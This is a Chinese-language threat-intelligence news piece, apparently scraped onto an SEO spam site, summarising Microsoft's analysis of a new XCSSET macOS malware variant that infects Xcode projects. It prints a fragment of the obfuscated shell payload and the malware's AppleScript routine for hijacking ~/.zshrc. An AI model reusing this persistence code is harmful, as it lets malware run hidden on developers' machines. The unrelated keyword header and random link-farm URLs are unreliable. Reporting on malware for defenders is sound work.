当前位置: 首页 > wzjs >正文

中国企业500强排行榜番禺厂家搜索seo

中国企业500强排行榜,番禺厂家搜索seo,流量精灵,wordpress页面判断微软威胁情报团队发现了一种新型的XCSSET变种,这是一种复杂的模块化macOS恶意软件,能够感染Xcode项目,并在开发者构建这些项目时执行。 这是自2022年以来的首个已知XCSSET变种,采用了增强的混淆方法、更新的持久化机制以及新的感…

image

微软威胁情报团队发现了一种新型的XCSSET变种,这是一种复杂的模块化macOS恶意软件,能够感染Xcode项目,并在开发者构建这些项目时执行。

这是自2022年以来的首个已知XCSSET变种,采用了增强的混淆方法、更新的持久化机制以及新的感染策略,旨在窃取macOS用户的敏感信息。

恶意软件的感染策略

该恶意软件的感染策略利用了开发者在开发与Apple或macOS相关的应用程序时共享项目文件的方式。新型XCSSET变种采用了模块化的方式,其有效载荷经过深度编码,并改进了错误处理机制。

为了在受感染设备上保持低调并尽可能保持无文件状态,该恶意软件广泛使用脚本语言、UNIX命令和合法二进制文件,这使得检测和清除变得极具挑战性。在代码层面,恶意软件对模块名称进行混淆,以阻碍静态分析,并采用随机化方法生成有效载荷。

与之前的变种仅依赖xxd(hexdump)进行编码不同,最新版本还引入了Base64编码技术。

持久化技术

该恶意软件采用了三种不同的持久化技术,确保其有效载荷在以下情况下启动:新shell会话开始、用户打开伪造的Launchpad应用程序或开发者在Git中提交更改。

微软研究人员指出,感染链由四个阶段组成,首先是构建受感染的Xcode项目时运行的混淆shell有效载荷。

混淆的第一阶段 shell payload(来源 – Microsoft)

第一阶段的有效载荷在被传输到 shell 之前,会经过多次十六进制解码迭代:

sh -c"(echo  33336363233343633335233303536

在初始感染之后,该恶意软件会从其命令与控制服务器(C2)下载额外的模块,其中包括能够窃取系统信息、浏览器扩展数据、数字钱包信息以及来自 “备忘录” 应用程序的笔记内容的组件。

该恶意软件通过几种复杂的方法来实现驻留。其中一种方法是修改~/.zshrc 文件,以便在每次启动新的 shell 会话时执行恶意代码。

.zshrc 驻留方法(来源:微软)

恶意软件在利用.zshrc 文件驻留时,会先检查是否存在恢复标志,然后根据标志决定是删除恶意文件,还是创建并更新它:

on doMain()tryif RESTORE_DEFAULT is true thendo shell script "rm -f ~/.zshrc_aliases"log ".zshrc_aliases removed"elseset payload to getPayloadBody("Terminal")set payload to quoted form of payloaddo shell script "echo " & payload & " > ~/.zshrc_aliases"log ".zshrc_aliases updated"set payload to "[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases"set payload to quoted form of payloaddo shell script "touch ~/.zshrc"do shell script "grep -qF '.zshrc_aliases' ~/.zshrc || echo " & payload & " >> ~/.zshrc"log ".zshrc done"end ifon error the errorMessagelog "failed at .zshrc: " & errorMessagereturnend try
end doMain

另一种驻留手段是创建一个伪装成启动台的恶意应用,只要用户试图打开真正的启动台,这个伪装应用就会执行恶意代码。

此外,恶意软件还会通过修改 Git 仓库的预提交钩子,在开发者提交更改时执行有效载荷,从而感染 Git 仓库。

微软建议用户及时更新到最新版本的操作系统,在使用 Xcode 项目时仔细检查,同时启用微软端点防护软件(Microsoft Defender for Endpoint)等安全防护工具,这些工具能够检测并隔离该恶意软件变种,有效保护系统安全。


文章转载自:

http://sybXFEag.xfkwL.cn
http://5BJF8Wir.xfkwL.cn
http://MQe8NCGq.xfkwL.cn
http://m1kQ3VbV.xfkwL.cn
http://VTCc2if2.xfkwL.cn
http://VlTH9W50.xfkwL.cn
http://q9Nf1UjD.xfkwL.cn
http://0nkXLZp9.xfkwL.cn
http://wmErwXiB.xfkwL.cn
http://ecnUiSwQ.xfkwL.cn
http://xjoHm6ec.xfkwL.cn
http://FgPYYjMd.xfkwL.cn
http://Ccebz8fi.xfkwL.cn
http://PNkKky4O.xfkwL.cn
http://OJ3L3gDG.xfkwL.cn
http://LZSCSKlN.xfkwL.cn
http://9Dux7bEt.xfkwL.cn
http://oTmJnJ3E.xfkwL.cn
http://rXNQctBu.xfkwL.cn
http://V59WFzZ0.xfkwL.cn
http://C1MBdoq5.xfkwL.cn
http://0xSfZDN1.xfkwL.cn
http://QHwIexWq.xfkwL.cn
http://lXb9IxV8.xfkwL.cn
http://42yJR6XD.xfkwL.cn
http://xALHS8wc.xfkwL.cn
http://mfSJfaxp.xfkwL.cn
http://fZShrTQ6.xfkwL.cn
http://d2sdqqIX.xfkwL.cn
http://yznU7kpS.xfkwL.cn
http://www.dtcms.com/wzjs/648440.html

相关文章:

  • 电子商务网站开发的流程图阿里巴巴怎么优化关键词排名
  • 网站建设基础教程视频网站流量提升
  • 老师教学生做网站吗上海网站建设赢昶
  • 网站建设设计服务商php网页设计
  • 做个网站费用多少合适川畅互联咨询 网站建设
  • 展示型企业网站有哪些wordpress加统计代码
  • 网站更换空间 收录慢免费crm网站下载的软件
  • 阿里营销网站建设中核二三公司是国企还是央企
  • 电子商务网站建设与管理期末考试怎样制作静态网站
  • 互联网网站建设咨询网站建设的实验小结
  • 如何做起一个网站推广复杂的手游app要多少钱
  • 为什么买的网站模版不好用下载网站软件免费安装
  • 安全标准化建设网站长沙58同城招聘网最新招聘
  • 如何知道别人的网站流量来自于哪里给网站定位
  • 网站备案流程以及所需资料学校网站建设分析
  • 深圳建设网站公司东莞58同城网招聘找工作
  • ppt免费下载雷锋网站西安做网站维护的公司
  • 网站建设公司在哪里开发平台都有哪些
  • 深圳商城网站设计推荐域名购买万网
  • 银川网站建设公司哪家好wordpress添加悬浮按钮
  • 快速做网站团队wordpress 进后台
  • 陵水网站建设哪家好兰州专业做网站的公司有哪些
  • 新开的公司建立网站有哪些要做的注册公司流程图
  • 微信网站cms房产网站代理
  • 网站集约化建设难点中国建设银行网站登录不上
  • 新乡网站建设设计公司栖霞酒店网站设计价格
  • 网站建设需要哪些材料企业网站模板建站
  • 上海高端网站定制开发什么是网站开发技术
  • nodejs做的网站排名好的网站建设企业
  • 企业网站建设公司电话c2m模式的电商平台有哪些